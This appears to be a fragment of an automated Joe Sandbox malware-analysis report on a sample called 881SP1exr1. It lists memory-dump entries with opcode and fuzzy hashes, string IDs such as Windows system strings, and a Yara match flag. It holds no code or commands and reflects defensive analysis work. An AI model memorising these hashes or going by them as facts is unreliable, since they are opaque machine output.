                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$MUI
                                                                                                                • API String ID: 0-17815947
                                                                                                                • Opcode ID: dc0a826f2a92b9fe4de51bf01ffa58d26de307d8dff8b034966ea80d40fb7100
                                                                                                                • Instruction ID: 848e69cd35be1f5621e902f2e010a349f37770d55523f71a44c528f0d1217d5d
                                                                                                                • Opcode Fuzzy Hash: dc0a826f2a92b9fe4de51bf01ffa58d26de307d8dff8b034966ea80d40fb7100
                                                                                                                • Instruction Fuzzy Hash: 14514971D0061DAEDF11DFE9CC80EEFBBB8EB58754F14052AEA11B72A1D6349A05CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • kLsE, xrefs: 01410540
                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0141063D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                • API String ID: 0-2547482624
                                                                                                                • Opcode ID: d18757a264d1f60e56cc2bf84fe32988759bc0fa888093fc320319b2f9b44946
                                                                                                                • Instruction ID: b85609824b371d4c785061297f8a115adc51f900e6419593ff4a75e357ea3ad4
                                                                                                                • Opcode Fuzzy Hash: d18757a264d1f60e56cc2bf84fe32988759bc0fa888093fc320319b2f9b44946
                                                                                                                • Instruction Fuzzy Hash: 0851DE715007428BC725EF69C5406A3BBE4AF94304F104C3FFAAA87365E730D985CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0141A2FB
                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0141A309
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                • API String ID: 0-2876891731
                                                                                                                • Opcode ID: 5a88a7a3dd7b8fd489cd0036d169bddf9393999e958a4d753424fdc66b829a40
                                                                                                                • Instruction ID: f71c2f9bf4e196bdf40c34cd141eb9af6d03802d7493e7ca209b22c61fd44c41
                                                                                                                • Opcode Fuzzy Hash: 5a88a7a3dd7b8fd489cd0036d169bddf9393999e958a4d753424fdc66b829a40
                                                                                                                • Instruction Fuzzy Hash: 5B41D070A01699DBDB12CF69C440BAA7BB4FF94704F24406BE904DB3B5E7B5DA41CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                • Opcode ID: 2fce416a8453c51825d0e0f1186edee73b7c5c2e53f31b255b6deac6627364ca
                                                                                                                • Instruction ID: ae2819e1ce337cea85ee492835dbf5ca630aa22356f407903fdd8a74fb09ca00
                                                                                                                • Opcode Fuzzy Hash: 2fce416a8453c51825d0e0f1186edee73b7c5c2e53f31b255b6deac6627364ca
                                                                                                                • Instruction Fuzzy Hash: CA01ADB2280700AFE311DF14CD4AB2677E8E794719F05893AE69DCB1A0E774D804CB4A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: MUI
                                                                                                                • API String ID: 0-1339004836
                                                                                                                • Opcode ID: a280c71277266a5925cff8f1858ae4b101fd728d6e079ef77501c7f01dd6a149
                                                                                                                • Instruction ID: 0344f3df8ddcec8b11c3bf0f90f16f0b94de8570e88e33c92b9ab29f3c8c1adc
                                                                                                                • Opcode Fuzzy Hash: a280c71277266a5925cff8f1858ae4b101fd728d6e079ef77501c7f01dd6a149
                                                                                                                • Instruction Fuzzy Hash: 4C827FB5E402198FDB25CFA9C8847EEBBB1BF48310F14816AD919AB369D7309D42CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 618e835c0a0f0a4d02676039383f7124ff33cfd6d932bd0b51fad614bfc49ba4
                                                                                                                • Instruction ID: 4711dc39ac5dbeb772c9115fbba9a44510d6bf329f6b5e1b9cce3e480a0fe9f6
                                                                                                                • Opcode Fuzzy Hash: 618e835c0a0f0a4d02676039383f7124ff33cfd6d932bd0b51fad614bfc49ba4
                                                                                                                • Instruction Fuzzy Hash: FF918472900219AFDF21DF95CD85FAEBBB8EF58750F11405AF600AB2A1D775AD04CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: d39974815a40214c2b7708d68586972dd2f2c5a2addde562dab54fda53e23e55
                                                                                                                • Instruction ID: 72e0027bed3167456b1d7a0c54aaedd499507efed6bf816d8e4b75ceb17beb21
                                                                                                                • Opcode Fuzzy Hash: d39974815a40214c2b7708d68586972dd2f2c5a2addde562dab54fda53e23e55
                                                                                                                • Instruction Fuzzy Hash: CE91A132901609AFDB269FA6DC84FEFBB79EF95750F14001AF501A7271D7349942CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: GlobalTags
                                                                                                                • API String ID: 0-1106856819
                                                                                                                • Opcode ID: 2b13e30838691ce4195f5c272b739dac5bf4bae8d8642c23b81664ed6a11c0cd
                                                                                                                • Instruction ID: ada7ada3c76efaaa41f74a6a452fb86bfa51e76bd53a528b12cbb283216d40d1
                                                                                                                • Opcode Fuzzy Hash: 2b13e30838691ce4195f5c272b739dac5bf4bae8d8642c23b81664ed6a11c0cd
                                                                                                                • Instruction Fuzzy Hash: 79719F75E0120A8FDF69EF9DC5806AEBBB1BF58700F15802FE509AB361E7308941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .mui
                                                                                                                • API String ID: 0-1199573805
                                                                                                                • Opcode ID: 003ad0c5ff50eea3418a4cc3da246b139e8ea3ed35d8e43f5647329eed788711
                                                                                                                • Instruction ID: a7544346ba6ca7a92db56b5e5cf8cb26e8108a1d20e99ef70279661cce3ad3f5
                                                                                                                • Opcode Fuzzy Hash: 003ad0c5ff50eea3418a4cc3da246b139e8ea3ed35d8e43f5647329eed788711
                                                                                                                • Instruction Fuzzy Hash: 2651B672D002259BDF10DF99D880AEEBBB8AF18614F09412FEA12B7361D3748D01CBB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: EXT-
                                                                                                                • API String ID: 0-1948896318
                                                                                                                • Opcode ID: 878476b02c4a2697c7d2df17cf20665b60c6821e57c3c290389d297b9814db53
                                                                                                                • Instruction ID: aac316a61201a2466d2cfcd2f4c328ead0d936545359a23e877ab1351fc7ebda
                                                                                                                • Opcode Fuzzy Hash: 878476b02c4a2697c7d2df17cf20665b60c6821e57c3c290389d297b9814db53
                                                                                                                • Instruction Fuzzy Hash: 6F41B5725043229BD720DB76C840B6BB7E8AFD8714F84092FF644E72A0E674D985C797
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                • Opcode ID: d777e288b7a46e6e01337cc1de82140befb44d30971c28ba23430f9882c0ee60
                                                                                                                • Instruction ID: 9b19dcce5a98a7f78198aa8e71d7c7f4e8e4385682c4a7768fb972b62aea8a3b
                                                                                                                • Opcode Fuzzy Hash: d777e288b7a46e6e01337cc1de82140befb44d30971c28ba23430f9882c0ee60
                                                                                                                • Instruction Fuzzy Hash: FD4187B1D5012DABDF21EB51CC84FDEB77CAB54714F0045AAEB08AB150DB709E888FA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #
                                                                                                                • API String ID: 0-1885708031
                                                                                                                • Opcode ID: 2f267fe011f648eda1a704c2f57637e11b095b74440450969172ae7dcaaf97f3
                                                                                                                • Instruction ID: cefb53bc2b64bbd1f8522aae19829ca2ca61897832d019f8461a4006394af2c1
                                                                                                                • Opcode Fuzzy Hash: 2f267fe011f648eda1a704c2f57637e11b095b74440450969172ae7dcaaf97f3
                                                                                                                • Instruction Fuzzy Hash: B7312B31A002199ADB32DB69C844BEFB7B4DF64704F9B402AE9509F2A2D775D845CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                • Opcode ID: 0b25e607c24e8f1161d80c7677708c1c20899a6d2a767dd283a04fe680fb6f08
                                                                                                                • Instruction ID: 28a5a415eb18d9be1c681344228171c2a5a4e27931e55795bdf810e510998792
                                                                                                                • Opcode Fuzzy Hash: 0b25e607c24e8f1161d80c7677708c1c20899a6d2a767dd283a04fe680fb6f08
                                                                                                                • Instruction Fuzzy Hash: 0631E336900919EFEB15EB59D885EBFBB74EB90720F01416BE905AB260D7309E04DBF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0149895E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                • API String ID: 0-702105204
                                                                                                                • Opcode ID: 88fa2181d3debbd5b2c7033f72af4282156542a57149e3450d48aca3c57a9d84
                                                                                                                • Instruction ID: 6488fffdaa0d15cd854f02ffaae04ee629a6329c7bdeaf2d168c076d7a612bf1
                                                                                                                • Opcode Fuzzy Hash: 88fa2181d3debbd5b2c7033f72af4282156542a57149e3450d48aca3c57a9d84
                                                                                                                • Instruction Fuzzy Hash: 6C01D43221020BAFEB225B9EC888A577F65FF96254B04002EEA411A676CB306845CA96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `vu
                                                                                                                • API String ID: 0-3883270627
                                                                                                                • Opcode ID: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
                                                                                                                • Instruction ID: 905457428d21d6e8233ebe5b9743c4661b32c2e049128a5f483ca5ec63fbe3b3
                                                                                                                • Opcode Fuzzy Hash: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
                                                                                                                • Instruction Fuzzy Hash: 52C0803169531942D1146C0DF8406F5F378EB13655F44637BDC05D7250D585D45503CD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d56e453dfc8e7bf9723932ecfca6873e0fc79664dcf2f6e93c2dec1336aa63d
                                                                                                                • Instruction ID: b359c178df3097c6679f4e089073506cf5337d3cb9a9db7262b2a54dd5b6752e
                                                                                                                • Opcode Fuzzy Hash: 5d56e453dfc8e7bf9723932ecfca6873e0fc79664dcf2f6e93c2dec1336aa63d
                                                                                                                • Instruction Fuzzy Hash: 7F42A4316043419BD715CF69C8D0EABBBE5AF98340F08492EFA9697370D7B4E845CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 213e701c07e6bd55499d803219e6fc7de05fe6dd00078baaf8b7471aa7539d4b
                                                                                                                • Instruction ID: c21490370e4fcd819873cd2bda8350a956b55dec0204556d58988fe5df2bae0d
                                                                                                                • Opcode Fuzzy Hash: 213e701c07e6bd55499d803219e6fc7de05fe6dd00078baaf8b7471aa7539d4b
                                                                                                                • Instruction Fuzzy Hash: 25426D71E0021A8FEB24CF69C841BAEBBF5FF58301F55819AE948AB351E7349985CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0bc203321a68263fa22def8ce063990a1f6be9cb598a49f2f1d021361d448207
                                                                                                                • Instruction ID: c8103697e585bdd39d0d03fce1970650bedf5a6f7fe048a5aec5c14549228cdf
                                                                                                                • Opcode Fuzzy Hash: 0bc203321a68263fa22def8ce063990a1f6be9cb598a49f2f1d021361d448207
                                                                                                                • Instruction Fuzzy Hash: 4832DE70A00B558BEB25CF6AC844BFABBF3BF84304F16411ED44A9B3A5D775A846CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 565ee95cfdf01709daaa63078135bc3ab4c7bb8662f24524ca9ed19a10b04857
                                                                                                                • Instruction ID: 050038d690b9fe118ddce76ad693e5895614a105f651e7f7ad81bb10d3a3e239
                                                                                                                • Opcode Fuzzy Hash: 565ee95cfdf01709daaa63078135bc3ab4c7bb8662f24524ca9ed19a10b04857
                                                                                                                • Instruction Fuzzy Hash: 4F22CD702046618BEB25CF2DC0D43B2BBF1AF44304F28845BD9968B3A6E735E552DB71
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 91f7602e1809a726f9e528da302ec638693b1060a7af077a8ba5db44ca03fe68
                                                                                                                • Instruction ID: e029a2c527a7a5affa38b43b71228e606a30663c198c8c24187b4035284d6848
                                                                                                                • Opcode Fuzzy Hash: 91f7602e1809a726f9e528da302ec638693b1060a7af077a8ba5db44ca03fe68
                                                                                                                • Instruction Fuzzy Hash: EC32AF71A00215CFDB25CFA9C480BAEBBF1FF48310F15856AE956AB3A5D774E842CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction ID: 8f5d368e916271de6abcb1980f587c25f59fafff9fe24320bf31c0dc5f1af220
                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction Fuzzy Hash: 63F16171E0021A9BDF15CF99C594BEEBBF5EF88710F09812AE905AB364D774D842CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fe57e6e9ccf117b71417e5de577f18fb1680b14ea1546972f9160e39887ea565
                                                                                                                • Instruction ID: 78f6f9e5886d9e2e1fa05c2d26232b398f7b2b839073ad74a2a21adc0ec4bd7c
                                                                                                                • Opcode Fuzzy Hash: fe57e6e9ccf117b71417e5de577f18fb1680b14ea1546972f9160e39887ea565
                                                                                                                • Instruction Fuzzy Hash: 8DD10271E0060B8BDF05CF59C841AFFB7F1EFA8305F9A816AD855A7251E735E9028B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0dd586f6636a9298a5231ba8e26fe51bb15093c27b8a5c9ed1d2e8df18fc3d80
                                                                                                                • Instruction ID: 2fc279f38ea93dcd4606fece207a27d80b08c03ec07830e8152eced2293c1a4e
                                                                                                                • Opcode Fuzzy Hash: 0dd586f6636a9298a5231ba8e26fe51bb15093c27b8a5c9ed1d2e8df18fc3d80
                                                                                                                • Instruction Fuzzy Hash: EDE1B171608342CFC715CF28C090A6BBBE1FF89314F06896EE9998B365DB71E945CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65caee60cf74d3d4ed90122fe23237d7c045a266080d8f2e7753bc104582f8fc
                                                                                                                • Instruction ID: ed6aad2ff870f1f240afa2b3b46b87c57747e7616ab65b2036f7f51c38eac650
                                                                                                                • Opcode Fuzzy Hash: 65caee60cf74d3d4ed90122fe23237d7c045a266080d8f2e7753bc104582f8fc
                                                                                                                • Instruction Fuzzy Hash: EDD1E271A006079BCB16DF6AC980ABB77A5FF64208F05463FE916DB2E0EB30D951CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                • Instruction ID: 8d5f137f15ea635bfe4a1aa1a474b5e665ff05bc2b8a26162474af431dc4b13b
                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                • Instruction Fuzzy Hash: 7DB16374A0060A9FDF24DF9DC940AABBFB5FF96314F14446EAA42D77A0DA34E905CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                • Instruction ID: 91310dd15477a3885750e372705df3b8e546757df8ee5ed9267bac232133af62
                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                • Instruction Fuzzy Hash: 30B129316006569FDB21DB68C850BBFBBF6AF84200F58055BE546DB3A1DB30ED82CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a3b34f3c02ad45d8aad2eec3473333ecc0448ccb22518cfe024017c7b634182
                                                                                                                • Instruction ID: 8a1f947ce7b9c5cf05e09394c38fcf0ccb22d5418d2ed2759eae5155298d7e8d
                                                                                                                • Opcode Fuzzy Hash: 7a3b34f3c02ad45d8aad2eec3473333ecc0448ccb22518cfe024017c7b634182
                                                                                                                • Instruction Fuzzy Hash: 69C146741083418FE764CF19C484BABBBE5FF98704F44496EE989873A1E774E909CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 28f3f25757d695292c60ee4430b1baea89fb06e7b7566a7cf488d159d03f4738
                                                                                                                • Instruction ID: 2583e44523a422019647f25aef34bb4432b31323358ad02b83d2118f2c2f59a9
                                                                                                                • Opcode Fuzzy Hash: 28f3f25757d695292c60ee4430b1baea89fb06e7b7566a7cf488d159d03f4738
                                                                                                                • Instruction Fuzzy Hash: 98B1A474A00265CBDB35CF59C880BAAB3B5EF54704F1485EAD50AE73A1DB31DD86CB21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 33be97221b5906b1225810186c4ec3788e5a7c2fe559d53e9afe638f71fe7f11
                                                                                                                • Instruction ID: f397effd7984214762acfaac9546a8ba5a074382ab4c2e2015fa25e47e0361d6
                                                                                                                • Opcode Fuzzy Hash: 33be97221b5906b1225810186c4ec3788e5a7c2fe559d53e9afe638f71fe7f11
                                                                                                                • Instruction Fuzzy Hash: 11A11471E016159FEB22DB98C844BEEBBA4BB48750F050127EA20BB3B1D7749D45CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
